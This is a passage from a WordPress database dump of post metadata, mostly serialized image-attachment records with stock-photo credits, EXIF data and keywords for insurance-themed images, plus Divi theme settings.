:\"medium\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51444;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"AdobeStock_373681300-1024x681.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162860;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41764;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-768x511.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115329;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"AdobeStock_373681300-1536x1021.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1021;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273829;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"AdobeStock_373681300-2048x1362.jpeg\";s:5:\"width\";i:2048;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:404961;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-400x250.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61274;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:34:\"AdobeStock_373681300-1080x675.jpeg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167890;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-400x284.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63951;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-510x382.jpeg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81081;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:34:\"AdobeStock_373681300-1080x718.jpeg\";s:5:\"width\";i:1080;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173399;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-400x516.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85218;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:5:{s:4:\"file\";s:35:\"AdobeStock_373681300-2880x1800.jpeg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:629092;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:34:\"AdobeStock_373681300-1280x851.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:851;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216058;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-980x652.jpeg\";s:5:\"width\";i:980;s:6:\"height\";i:652;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154510;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:33:\"AdobeStock_373681300-480x319.jpeg\";s:5:\"width\";i:480;s:6:\"height\";i:319;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71888;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:32:\"Prostock-studio - stock.adobe.co\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark IV\";s:7:\"caption\";s:109:\"Family Housing Concept. Parents Making Symbolic Roof Joining Hands Above Their Kids Sitting On Floor At Home.\";s:17:\"created_timestamp\";s:10:\"1594751692\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:69:\"Parents Making Symbolic Roof Joining Hands Above Kids Sitting Indoors\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:49:{i:0;s:6:\"family\";i:1;s:7:\"housing\";i:2;s:4:\"home\";i:3;s:10:\"relocation\";i:4;s:9:\"caucasian\";i:5;s:3:\"new\";i:6;s:5:\"house\";i:7;s:4:\"roof\";i:8;s:11:\"real estate\";i:9;s:8:\"mortgage\";i:10;s:8:\"property\";i:11;s:5:\"hands\";i:12;s:9:\"insurance\";i:13;s:11:\"residential\";i:14;s:10:\"investment\";i:15;s:4:\"wife\";i:16;s:5:\"dream\";i:17;s:6:\"mother\";i:18;s:4:\"rent\";i:19;s:8:\"domestic\";i:20;s:5:\"happy\";i:21;s:4:\"kids\";i:22;s:4:\"flat\";i:23;s:11:\"millennials\";i:24;s:7:\"concept\";i:25;s:5:\"adult\";i:26;s:10:\"background\";i:27;s:5:\"smile\";i:28;s:6:\"indoor\";i:29;s:5:\"group\";i:30;s:3:\"man\";i:31;s:8:\"children\";i:32;s:3:\"boy\";i:33;s:5:\"white\";i:34;s:9:\"apartment\";i:35;s:7:\"husband\";i:36;s:6:\"people\";i:37;s:4:\"male\";i:38;s:4:\"four\";i:39;s:9:\"lifestyle\";i:40;s:9:\"ownership\";i:41;s:5:\"woman\";i:42;s:4:\"life\";i:43;s:5:\"child\";i:44;s:5:\"young\";i:45;s:6:\"female\";i:46;s:7:\"parents\";i:47;s:6:\"father\";i:48;s:4:\"girl\";}}s:14:\"original_image\";s:25:\"AdobeStock_373681300.jpeg\";s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"84\";s:8:\"quantity\";d:41;s:4:\"webp\";i:0;}}'),(787,242,'_thumbnail_id','243'),(790,242,'_et_post_bg_color','#ffffff'),(791,242,'_et_post_bg_layout','light'),(792,242,'_et_pb_show_title','on'),(793,242,'_et_pb_post_hide_nav','default'),(794,242,'_et_pb_page_layout','et_right_sidebar'),(795,242,'_et_pb_side_nav','off'),(796,242,'_et_pb_use_builder',''),(797,242,'_et_pb_first_image',''),(798,242,'_et_pb_truncate_post',''),(799,242,'_et_pb_truncate_post_date',''),(800,242,'_et_pb_old_content',''),(802,246,'_edit_lock','1679247695:3'),(803,246,'_edit_last','3'),(804,247,'_wp_attached_file','2023/03/Medicare-Choices-Advantage-1000x657-1.jpg'),(805,247,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:657;s:4:\"file\";s:49:\"2023/03/Medicare-Choices-Advantage-1000x657-1.jpg\";s:8:\"filesize\";i:379301;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35266;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25834;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-768x505.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94020;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44225;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47725;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64896;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63715;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-980x644.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130231;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:49:\"Medicare-Choices-Advantage-1000x657-1-480x315.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:315;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54517;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"Jérôme Rommé - stock.adobe.co\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480017996\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:17:\"cloud services fr\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:38:{i:0;s:8:\"medicare\";i:1;s:8:\"hospital\";i:2;s:9:\"insurance\";i:3;s:12:\"prescription\";i:4;s:10:\"drug plans\";i:5;s:15:\"advantage plans\";i:6;s:17:\"medical insurance\";i:7;s:4:\"plan\";i:8;s:4:\"care\";i:9;s:4:\"cost\";i:10;s:7:\"disease\";i:11;s:11:\"health care\";i:12;s:8:\"medicaid\";i:13;s:7:\"patient\";i:14;s:7:\"service\";i:15;s:7:\"therapy\";i:16;s:9:\"treatment\";i:17;s:7:\"concept\";i:18;s:4:\"text\";i:19;s:4:\"word\";i:20;s:4:\"work\";i:21;s:10:\"chalkboard\";i:22;s:5:\"chalk\";i:23;s:10:\"blackboard\";i:24;s:6:\"schema\";i:25;s:7:\"diagram\";i:26;s:6:\"target\";i:27;s:10:\"background\";i:28;s:7:\"acronym\";i:29;s:6:\"layout\";i:30;s:5:\"graph\";i:31;s:5:\"goals\";i:32;s:4:\"step\";i:33;s:10:\"word cloud\";i:34;s:9:\"corporate\";i:35;s:4:\"draw\";i:36;s:11:\"handwriting\";i:37;s:7:\"medical\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"72\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(806,246,'_thumbnail_id','247'),(807,246,'_et_post_bg_color','#ffffff'),(808,246,'_et_post_bg_layout','light'),(809,246,'_et_pb_show_title','on'),(810,246,'_et_pb_post_hide_nav','default'),(811,246,'_et_pb_page_layout','et_right_sidebar'),(812,246,'_et_pb_side_nav','off'),(816,246,'_et_pb_use_builder',''),(817,246,'_et_pb_first_image',''),(818,246,'_et_pb_truncate_post',''),(819,246,'_et_pb_truncate_post_date',''),(820,246,'_et_pb_old_content',''),(823,250,'_wp_attached_file','2023/03/Jigsaw-puzzle-with-Franklin-1000x674-1.jpg'),(822,249,'_edit_last','3'),(821,249,'_edit_lock','1679247723:3'),(824,250,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:674;s:4:\"file\";s:50:\"2023/03/Jigsaw-puzzle-with-Franklin-1000x674-1.jpg\";s:8:\"filesize\";i:1078780;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37462;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26807;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-768x518.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:518;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156457;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49454;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53664;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82690;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95397;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-980x661.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:661;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:251337;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:50:\"Jigsaw-puzzle-with-Franklin-1000x674-1-480x324.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67470;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:28:\"Nomad_Soul - stock.adobe.com\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:42:\"Jigsaw puzzle with Franklin looking to you\";s:17:\"created_timestamp\";s:10:\"1346889600\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:27:\"Jigsaw puzzle with Franklin\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:38:{i:0;s:8:\"abstract\";i:1;s:8:\"attached\";i:2;s:10:\"background\";i:3;s:7:\"banking\";i:4;s:8:\"banknote\";i:5;s:4:\"bill\";i:6;s:8:\"business\";i:7;s:9:\"cardboard\";i:8;s:4:\"cash\";i:9;s:8:\"close-up\";i:10;s:8:\"concepts\";i:11;s:7:\"connect\";i:12;s:10:\"connection\";i:13;s:6:\"credit\";i:14;s:8:\"currency\";i:15;s:7:\"dollars\";i:16;s:8:\"finances\";i:17;s:8:\"franklin\";i:18;s:5:\"games\";i:19;s:5:\"group\";i:20;s:5:\"ideas\";i:21;s:6:\"jigsaw\";i:22;s:7:\"leisure\";i:23;s:7:\"looking\";i:24;s:5:\"money\";i:25;s:6:\"nobody\";i:26;s:7:\"objects\";i:27;s:5:\"order\";i:28;s:4:\"part\";i:29;s:7:\"pattern\";i:30;s:5:\"piece\";i:31;s:5:\"purse\";i:32;s:6:\"puzzle\";i:33;s:7:\"savings\";i:34;s:8:\"solution\";i:35;s:8:\"strategy\";i:36;s:4:\"view\";i:37;s:6:\"wealth\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"77\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(825,249,'_thumbnail_id','250'),(826,249,'_et_post_bg_color','#ffffff'),(827,249,'_et_post_bg_layout','light'),(828,249,'_et_pb_show_title','on'),(829,249,'_et_pb_post_hide_nav','default'),(830,249,'_et_pb_page_layout','et_right_sidebar'),(831,249,'_et_pb_side_nav','off'),(837,249,'_et_pb_use_builder',''),(838,249,'_et_pb_first_image',''),(839,249,'_et_pb_truncate_post',''),(840,249,'_et_pb_truncate_post_date',''),(841,249,'_et_pb_old_content',''),(844,254,'_wp_attached_file','2023/03/Beneficiary-word-cloud-1000x667-1.jpg'),(843,253,'_edit_last','3'),(842,253,'_edit_lock','1679247775:3'),(845,254,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:45:\"2023/03/Beneficiary-word-cloud-1000x667-1.jpg\";s:8:\"filesize\";i:492908;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33656;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24966;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98888;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44591;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47654;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67015;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67321;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135395;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:45:\"Beneficiary-word-cloud-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54914;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:29:\"ibreakstock - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:30:\"Beneficiary word cloud concept\";s:17:\"created_timestamp\";s:10:\"1403369021\";s:9:\"copyright\";s:11:\"ibreakstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:22:\"Beneficiary word cloud\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:40:{i:0;s:11:\"beneficiary\";i:1;s:5:\"death\";i:2;s:4:\"life\";i:3;s:9:\"insurance\";i:4;s:7:\"finance\";i:5;s:10:\"protection\";i:6;s:8:\"security\";i:7;s:6:\"policy\";i:8;s:4:\"loss\";i:9;s:9:\"safeguard\";i:10;s:7:\"payment\";i:11;s:7:\"insured\";i:12;s:8:\"premiums\";i:13;s:6:\"health\";i:14;s:5:\"heart\";i:15;s:8:\"business\";i:16;s:6:\"office\";i:17;s:13:\"communication\";i:18;s:9:\"corporate\";i:19;s:6:\"online\";i:20;s:10:\"technology\";i:21;s:6:\"screen\";i:22;s:9:\"diversity\";i:23;s:6:\"laptop\";i:24;s:9:\"workplace\";i:25;s:7:\"digital\";i:26;s:11:\"businessmen\";i:27;s:10:\"occupation\";i:28;s:12:\"professional\";i:29;s:5:\"group\";i:30;s:7:\"working\";i:31;s:8:\"learning\";i:32;s:4:\"plan\";i:33;s:8:\"browsing\";i:34;s:6:\"device\";i:35;s:4:\"team\";i:36;s:8:\"strategy\";i:37;s:8:\"computer\";i:38;s:8:\"property\";i:39;s:10:\"conference\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"73\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(846,253,'_thumbnail_id','254'),(847,253,'_et_post_bg_color','#ffffff'),(848,253,'_et_post_bg_layout','light'),(849,253,'_et_pb_show_title','on'),(850,253,'_et_pb_post_hide_nav','default'),(851,253,'_et_pb_page_layout','et_right_sidebar'),(852,253,'_et_pb_side_nav','off'),(856,253,'_et_pb_use_builder',''),(857,253,'_et_pb_first_image',''),(858,253,'_et_pb_truncate_post',''),(859,253,'_et_pb_truncate_post_date',''),(860,253,'_et_pb_old_content',''),(863,257,'_wp_attached_file','2023/03/The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1.jpg'),(862,256,'_edit_last','3'),(861,256,'_edit_lock','1679247817:3'),(864,257,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:69:\"2023/03/The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1.jpg\";s:8:\"filesize\";i:390606;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26954;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21233;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65011;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32987;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35086;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45849;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50938;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88141;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:69:\"The-word-or-phrase-Beneficiary-in-a-dictionary-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39689;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"sharafmaksumov - stock.adobe.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:46:\"The word or phrase Beneficiary in a dictionary\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:15:\"Sharaf Maksumov\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:47:\"The word or phrase Beneficiary in a dictionary.\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:16:{i:0;s:11:\"Beneficiary\";i:1;s:10:\"definition\";i:2;s:10:\"dictionary\";i:3;s:4:\"word\";i:4;s:11:\"highlighted\";i:5;s:4:\"text\";i:6;s:7:\"concept\";i:7;s:10:\"conceptual\";i:8;s:5:\"white\";i:9;s:5:\"black\";i:10;s:5:\"paper\";i:11;s:4:\"page\";i:12;s:10:\"magnifying\";i:13;s:5:\"glass\";i:14;s:9:\"editorial\";i:15;s:12:\"illustrative\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"76\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(865,256,'_thumbnail_id','257'),(866,256,'_et_post_bg_color','#ffffff'),(867,256,'_et_post_bg_layout','light'),(868,256,'_et_pb_show_title','on'),(869,256,'_et_pb_post_hide_nav','default'),(870,256,'_et_pb_page_layout','et_right_sidebar'),(871,256,'_et_pb_side_nav','off'),(899,256,'_et_pb_use_builder',''),(900,256,'_et_pb_first_image',''),(901,256,'_et_pb_truncate_post',''),(902,256,'_et_pb_truncate_post_date',''),(903,256,'_et_pb_old_content',''),(905,278,'_edit_last','3'),(904,278,'_edit_lock','1679247845:3'),(908,281,'_wp_attached_file','2023/03/Life-insurance-policy-1000x564-1.jpg'),(909,281,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:564;s:4:\"file\";s:44:\"2023/03/Life-insurance-policy-1000x564-1.jpg\";s:8:\"filesize\";i:211153;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24235;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19358;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55563;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31195;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32950;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42266;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40668;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:44:\"Life-insurance-policy-1000x564-1-980x553.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:553;s:9:\"mi